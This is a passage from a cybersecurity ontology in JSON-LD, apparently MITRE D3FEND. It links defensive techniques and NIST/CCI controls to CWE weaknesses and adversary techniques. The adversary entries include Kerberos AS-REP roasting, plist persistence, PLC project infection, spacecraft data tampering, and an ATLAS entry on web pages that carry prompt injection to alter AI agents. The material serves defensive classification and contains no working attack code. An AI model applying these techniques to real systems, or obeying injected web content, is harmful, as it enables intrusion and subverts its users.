      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N43cfd38702604ea88ec06cbed3137d24"
        }
      ]
    },
    {
      "@id": "_:N43cfd38702604ea88ec06cbed3137d24",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:resumes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_28",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Linear Filter Pipelines",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(28)"
    },
    {
      "@id": "d3f:Reference-NIST-SP800-116r1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-116r1.pdf"
      },
      "d3f:kb-abstract": "This recommendation provides a technical guideline to use Personal Identity Verification (PIV) Cards in facility access; enabling federal agencies to operate as government-wide interoperable enterprises. These guidelines cover the risk-based strategy to select appropriate PIV authentication mechanisms as expressed within Federal Information Processing Standard (FIPS) 201.",
      "d3f:kb-author": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ElectronicLockMonitoring"
        },
        {
          "@id": "d3f:ProximitySensorMonitoring"
        }
      ],
      "d3f:kb-reference-title": "Guidelines for the Use of PIV Credentials in Facility Acces",
      "rdfs:label": "Reference - NIST SP 800-116 Rev. 1"
    },
    {
      "@id": "d3f:CCI-002290_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system supports the association of organization-defined security attributes with organization-defined objects by authorized individuals (or processes acting on behalf of individuals).",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002290"
    },
    {
      "@id": "d3f:ApplicationExceptionMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ApplicationExceptionMonitoring"
      ],
      "d3f:d3fend-id": "D3-AEM",
      "d3f:definition": "Monitoring the failures of system counters and timers.",
      "d3f:kb-article": "## How it works\nMonitoring timer and counter failures or exceedances can reveal issues with the program or platform, and is important for both safety and security. It may also help identify tampering or malicious activity affecting the device or the processes it controls.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
      },
      "d3f:monitors": [
        {
          "@id": "d3f:ApplicationFailureCountVariable"
        },
        {
          "@id": "d3f:Log"
        }
      ],
      "d3f:synonym": "Application Failure Monitoring",
      "rdfs:label": "Application Exception Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationPerformanceMonitoring"
        },
        {
          "@id": "_:Nc793035088a74893ae2f521201f0cbc8"
        },
        {
          "@id": "_:N2f74786af1bd49b9b8ebba2638e9540e"
        }
      ]
    },
    {
      "@id": "_:Nc793035088a74893ae2f521201f0cbc8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationFailureCountVariable"
      }
    },
    {
      "@id": "_:N2f74786af1bd49b9b8ebba2638e9540e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Log"
      }
    },
    {
      "@id": "d3f:T1558.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1558.004",
      "d3f:definition": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017)",
      "rdfs:label": "AS-REP Roasting",
      "rdfs:subClassOf": {
        "@id": "d3f:T1558"
      }
    },
    {
      "@id": "d3f:extends",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x extends y: The entity x extends the scope or range or area of entity y, especially in the sense of widening the range of applications.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00541315-v"
      },
      "rdfs:label": "extends",
      "rdfs:subPropertyOf": {
        "@id": "d3f:modifies"
      }
    },
    {
      "@id": "d3f:Certificate-basedAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Certificate-basedAuthentication"
      ],
      "d3f:d3fend-id": "D3-CBAN",
      "d3f:definition": "Requiring a digital certificate in order to authenticate a user.",
      "d3f:kb-article": "## How it works\n\nCertificate-based authentication is a security mechanism that uses digital certificates to verify the identity of a user, device, or server before granting access to a network or system. This method relies on a pair of cryptographic keys: a public key and a private key.\n\n## Considerations\n\n* Private Key Protection: Ensure that private keys are securely stored and protected against unauthorized access.\n* Certificate Revocation: Implement a robust process for revoking certificates if they are compromised or no longer needed.\n* Man-in-the Middle Attacks: Use mutual authentication to mitigate the risk of these attacks.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-FederalPublicKeyInfrastructure101"
      },
      "d3f:reads": {
        "@id": "d3f:Certificate"
      },
      "rdfs:label": "Certificate-based Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentAuthentication"
        },
        {
          "@id": "_:Na1e864ac90674d30908d837aedf89590"
        }
      ]
    },
    {
      "@id": "_:Na1e864ac90674d30908d837aedf89590",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "d3f:AML.T0078",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0078",
      "d3f:definition": "Adversaries may gain access to an AI system through a user visiting a website over the normal course of browsing, or an AI agent retrieving information from the web on behalf of a user. Websites can contain an [LLM Prompt Injection](/techniques/AML.T0051) which, when executed, can change the behavior of the AI model.\n\nThe same approach may be used to deliver other types of malicious code that don't target AI directly (See [Drive-by Compromise in ATT&CK](https://attack.mitre.org/techniques/T1189/)).",
      "rdfs:label": "Drive-by Compromise - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0078"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASInitialAccessTechnique"
      },
      "skos:prefLabel": "Drive-by Compromise"
    },
    {
      "@id": "d3f:AML.T0050",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0050",
      "d3f:definition": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.\n\nThere are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.",
      "rdfs:label": "Command and Scripting Interpreter - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0050"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExecutionTechnique"
      },
      "skos:prefLabel": "Command and Scripting Interpreter"
    },
    {
      "@id": "d3f:FileMountEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file system or storage volume is mounted, making its files and directories accessible to the operating system or applications.",
      "rdfs:label": "File Mount Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FileEvent"
      }
    },
    {
      "@id": "d3f:Transponder",
      "@type": "owl:Class",
      "d3f:definition": "In telecommunications, a transponder is a device that, upon receiving a signal, emits a different signal in response.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Transponder"
      },
      "rdfs:label": "Transponder",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:T1211",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1211",
      "d3f:definition": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.",
      "d3f:may-modify": [
        {
          "@id": "d3f:ProcessCodeSegment"
        },
        {
          "@id": "d3f:StackFrame"
        }
      ],
      "rdfs:label": "Exploitation for Defense Evasion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N639d30b66b524d4488efa235251727d5"
        },
        {
          "@id": "_:N5c5cc3ddafae430f99b1d6eb53141c37"
        }
      ]
    },
    {
      "@id": "_:N639d30b66b524d4488efa235251727d5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "_:N5c5cc3ddafae430f99b1d6eb53141c37",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:ATTACKMobilePersistenceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0028"
      },
      "rdfs:label": "Persistence Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N86c82cdc900d4efa8776dec122269c8f"
        }
      ],
      "skos:prefLabel": "Persistence Technique"
    },
    {
      "@id": "_:N86c82cdc900d4efa8776dec122269c8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0028"
      }
    },
    {
      "@id": "d3f:CWE-762",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-762",
      "d3f:definition": "The product attempts to return a memory resource to the system, but it calls a release function that is not compatible with the function that was originally used to allocate that resource.",
      "rdfs:label": "Mismatched Memory Management Routines",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-763"
      }
    },
    {
      "@id": "d3f:CredentialRotation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialRotation"
      ],
      "d3f:d3fend-id": "D3-CRO",
      "d3f:definition": "Credential rotation is a security procedure in which authentication credentials, such as passwords, API keys, or certificates, are regularly changed or replaced to minimize the risk of unauthorized access.",
      "d3f:kb-article": "## How it works\n\nCredentials can be systematically changed at predetermined intervals or based on specific events.  Credentials such as user passwords may be rotated manually, but it is increasingly common to use an automated system to manage rotation of enterprise passwords, certificates and keys.\n\n## Considerations\n\n- Rotation of credentials must be managed carefully to avoid inadvertent service interruption\n- Management servers with enterprise policies for account management provide the ability to change or reset passwords for accounts. Some organizations rotate credentials periodically to limit the risk of stolen credentials.\n- When responding to an incident, severity of compromise should be considered to determine what credentials to what accounts should be regenerated\n- If proactively rotating credentials periodically, several factors should be considered to determine the frequency. Also introduces some risk including promoting the creation of weak passwords and poor storage practices for employees and presents challenges in proper tracking.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PasswordandKeyRotation-SSH"
        },
        {
          "@id": "d3f:Reference-EvictionGuidanceforNetworksAffectedbytheSolarWindsandActiveDirectory/M365Compromise-CISA"
        }
      ],
      "d3f:regenerates": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Credential Rotation",
      "rdfs:seeAlso": {
        "@id": "https://www.ituonline.com/tech-definitions/what-is-credential-rotation/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialHardening"
        },
        {
          "@id": "_:N34ea37b054214b6eb087200ab785e085"
        }
      ]
    },
    {
      "@id": "_:N34ea37b054214b6eb087200ab785e085",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:regenerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IA-2_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Identification and Authentication (organizational Users) | Access to Accounts —separate Device",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "rdfs:label": "IA-2(6)"
    },
    {
      "@id": "d3f:T1547.011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.011",
      "d3f:definition": "Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, <code>Info.plist</code>, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description)",
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfigurationFile"
      },
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1647",
      "rdfs:label": "Plist Modification",
      "rdfs:seeAlso": {
        "@id": "d3f:T1647"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N24542c08012c47d49b4f1241019e461a"
        }
      ]
    },
    {
      "@id": "_:N24542c08012c47d49b4f1241019e461a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfigurationFile"
      }
    },
    {
      "@id": "d3f:EX-0012.06",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.06",
      "d3f:definition": "Payload data, and the metadata that gives it meaning, can be altered in place to steal value, mislead users, or degrade mission outputs. Targets include raw detector frames, packetized Level-0 streams, onboard preprocessed products, and file catalogs/directories on mass memory. Adjacent metadata such as timestamps, pointing/attitude tags, calibration coefficients, compression settings, and quality flags are equally potent; slight bias in a calibration table or time tag can skew entire downlink campaigns while appearing routine. An adversary may rewrite frame headers, reorder packets, substitute segments from prior passes, or flip quality bits so ground pipelines silently discard or misclassify products. Recorder index manipulation can orphan files or cause downlinks to serve stale or fabricated content. Because many missions perform some processing or filtering onboard, tampering upstream of downlink propagates forward as “authoritative” truth, jeopardizing mission objectives without obvious protocol anomalies.",
      "rdfs:label": "Science/Payload Data - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/06/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Science/Payload Data"
    },
    {
      "@id": "d3f:RandomSplits",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RS",
      "d3f:definition": "The dataset is repeatedly sampled with a random split of the data into train and test sets.",
      "d3f:kb-article": "## References\nHow to Create a Random Split Cross-Validation and Bagging Ensemble for Deep Learning in Keras.\"*Machine Learning Mastery*.  [Link](https://machinelearningmastery.com/how-to-create-a-random-split-cross-validation-and-bagging-ensemble-for-deep-learning-in-keras/).",
      "rdfs:label": "Random Splits",
      "rdfs:subClassOf": {
        "@id": "d3f:ResamplingEnsemble"
      }
    },
    {
      "@id": "d3f:OTProgramModeCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Command that places the controller in a mode capable of reprogramming logic. This may or may not stop the program.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Program Mode Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:Ncf163d608a4b40a1903cbd28bac50c6e"
        }
      ]
    },
    {
      "@id": "_:Ncf163d608a4b40a1903cbd28bac50c6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:T1059.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.011",
      "d3f:definition": "Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)",
      "rdfs:label": "Lua",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:T1158",
      "@type": "owl:Class",
      "d3f:attack-id": "T1158",
      "d3f:definition": "To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1564.001",
      "rdfs:label": "Hidden Files and Directories",
      "rdfs:seeAlso": {
        "@id": "d3f:T1564.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002382_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:Hardware-basedProcessIsolation"
        },
        {
          "@id": "d3f:Kernel-basedProcessIsolation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization implements security functions as largely independent modules that maximize internal cohesiveness within modules and minimize coupling between modules.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002382"
    },
    {
      "@id": "d3f:IA-0009.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0009.02",
      "d3f:definition": "Vendors that design, integrate, or support mission systems often hold elevated, persistent routes into operations: remote administration of ground software and modems, access to identity providers and license servers, control of cloud-hosted services, and authority to deliver firmware, bitstreams, or patches. Attackers who compromise a vendor’s enterprise or build environment can assume these roles, issuing commands through approved consoles, queuing updates in provider-operated portals, or invoking maintenance procedures that the mission expects the vendor to perform. Some vendor pathways terminate directly on RF equipment or key-management infrastructure; others ride cross-account cloud roles or managed SaaS backends that handle mission data and scheduling.",
      "rdfs:label": "Vendor - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0009/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0009"
      },
      "skos:prefLabel": "Vendor"
    },
    {
      "@id": "d3f:ProcessDataSegment",
      "@type": "owl:Class",
      "d3f:definition": "A process data segment, is a portion of the program's virtual address space that contains executable instructions and corresponds to the loaded image data segment.",
      "rdfs:label": "Process Data Segment",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ImageDataSegment"
        },
        {
          "@id": "dbr:Data_segment"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:T1508",
      "@type": "owl:Class",
      "d3f:attack-id": "T1508",
      "d3f:definition": "A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1628.001",
      "rdfs:label": "Suppress Application Icon - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1628.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Suppress Application Icon"
    },
    {
      "@id": "d3f:OperationalRiskAssessment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperationalRiskAssessment"
      ],
      "d3f:d3fend-id": "D3-ORA",
      "d3f:definition": "Operational risk assessment identifies and models the vulnerabilities of, and risks to, an organization's activities individually and as a whole.",
      "d3f:evaluates": {
        "@id": "d3f:Organization"
      },
      "d3f:identifies": {
        "@id": "d3f:Vulnerability"
      },
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MGT516ManagingSecurityVulnerabilitiesEnterpriseAndCloud"
        },
        {
          "@id": "d3f:Reference-NIST-RMF-Quick-Start-Guide-Assess-Step-FAQ"
        },
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-160-Volume-1"
        },
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-37-Revision-2"
        },
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-53A-Revision-5"
        },
        {
          "@id": "d3f:Reference-NISTIR-8011-Volume-1"
        }
      ],
      "d3f:synonym": "Mission Risk Assessment",
      "rdfs:label": "Operational Risk Assessment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "_:Naf40d2ffabe84681ae0664c39d4a78b4"
        },
        {
          "@id": "_:N4c5ec67b31124b70a78885719c48d9f5"
        }
      ]
    },
    {
      "@id": "_:Naf40d2ffabe84681ae0664c39d4a78b4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:evaluates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Organization"
      }
    },
    {
      "@id": "_:N4c5ec67b31124b70a78885719c48d9f5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Vulnerability"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodsThereofForDetectionOfPersistentThreatsInAComputerizedEnvironmentBackground_PaloAltoNetworksIncCyberSecdoLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170206358A1/en?oq=US-2017206358-A1"
      },
      "d3f:kb-abstract": "A system is used for detection of advanced persistent and non-persistent threats in a computerized environment. The system is connected to a plurality of user devices coupled to an enterprise's network. The system receives via an interface an electronic notification of at least one event in the operating system of the computer. The system then analyzes the at least one event. The system then generates a causality chain for the at least one event respective of the analysis. The causality chain comprises all the threads that attributed to the at least one event in a chronological order. The system then identifies a main thread that started the causality chain that led to the at least one event. Then, the system determines whether the main thread is associated with malicious software. Upon determination that the main thread is associated with malicious software, the causality chain is marked as infected.",
      "d3f:kb-author": "Gil BARAK",
      "d3f:kb-mitre-analysis": "The patent describes detecting malicious events on a host. For each new event (e.x. new file request received from a user device, a change in an existing file in a container) a causality chain is developed for all threads associated with the event. The causality chain identifies the thread that started the process of the event (main thread). If a thread in the causality chain has no parent, i.e. no main thread associated with it, the process is identified as malicious.",
      "d3f:kb-organization": "Palo Alto Networks IncCyber Secdo Ltd",
      "d3f:kb-reference-title": "System and methods thereof for detection of persistent threats in a computerized environment background",
      "rdfs:label": "Reference - System and methods thereof for detection of persistent threats in a computerized environment background - Palo Alto Networks IncCyber Secdo Ltd"
    },
    {
      "@id": "d3f:CWE-121",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-121",
      "d3f:definition": "A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function).",
      "d3f:synonym": "Stack Overflow",
      "rdfs:label": "Stack-based Buffer Overflow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-787"
        },
        {
          "@id": "d3f:CWE-788"
        }
      ]
    },
    {
      "@id": "d3f:RuntimeVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A runtime variable is an abstract storage location paired with an associated symbolic name, which contains some known or unknown quantity of data or object referred to as a value, which can change during the execution of a computer program.",
      "rdfs:label": "Runtime Variable",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Variable_(computer_science)"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:LocalFileAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:LocalFileAccessMediation"
      ],
      "d3f:d3fend-id": "D3-LFAM",
      "d3f:definition": "Local file access mediation is the process of an operating system granting or denying a specific access request to a local file.",
      "d3f:filters": {
        "@id": "d3f:OpenFile"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-FileAndFolderPermissions"
      },
      "d3f:synonym": "Local File Access Control",
      "rdfs:comment": "Replaces d3-LFP",
      "rdfs:label": "Local File Access Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCallFiltering"
        },
        {
          "@id": "_:N716ee160a8d7451493030d08d3eed509"
        }
      ]
    },
    {
      "@id": "_:N716ee160a8d7451493030d08d3eed509",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OpenFile"
      }
    },
    {
      "@id": "d3f:GetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:queries": {
        "@id": "d3f:Thread"
      },
      "rdfs:label": "Get Thread Context",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N1c5f9f3a89e24377a044c7ded7fd3b04"
        }
      ]
    },
    {
      "@id": "_:N1c5f9f3a89e24377a044c7ded7fd3b04",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:queries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:T0873",
      "@type": "owl:Class",
      "d3f:attack-id": "T0873",
      "d3f:definition": "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev)",
      "rdfs:label": "Project File Infection - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSPersistenceTechnique"
      },
      "skos:prefLabel": "Project File Infection"
    },
    {
      "@id": "d3f:UserInterface",
      "@type": "owl:Class",
      "d3f:definition": "The user interface (UI), in the industrial design field of human-machine interaction, is the space where interactions between humans and machines occur. The goal of this interaction is to allow effective operation and control of the machine from the human end, whilst the machine simultaneously feeds back information that aids the operators' decision-making process. Examples of this broad concept of user interfaces include the interactive aspects of computer operating systems, hand tools, heavy machinery operator controls, and process controls. The design considerations applicable when creating user interfaces are related to or involve such disciplines as ergonomics and psychology.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:User_interface"
      },
      "rdfs:label": "User Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "UI"
    },
    {
      "@id": "d3f:UserStartupScriptFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user startup script file is a shortcut file that is executed when a user logs in and starts a session on the host.  These indicate applications the user wants started at login.  For Windows, these are typically found in the user's startup directory.",
      "rdfs:label": "User Startup Script File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutableScript"
        },
        {
          "@id": "d3f:UserLogonInitResource"
        }
      ]
    },
    {
      "@id": "d3f:CWE-124",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-124",
      "d3f:definition": "The product writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer.",
      "d3f:synonym": "buffer underrun",
      "rdfs:label": "Buffer Underwrite ('Buffer Underflow')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-786"
        },
        {
          "@id": "d3f:CWE-787"
        }
      ]
    },
    {
      "@id": "d3f:Reference-DLLInjectionViaLoadLibrary_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-10-002/"
      },
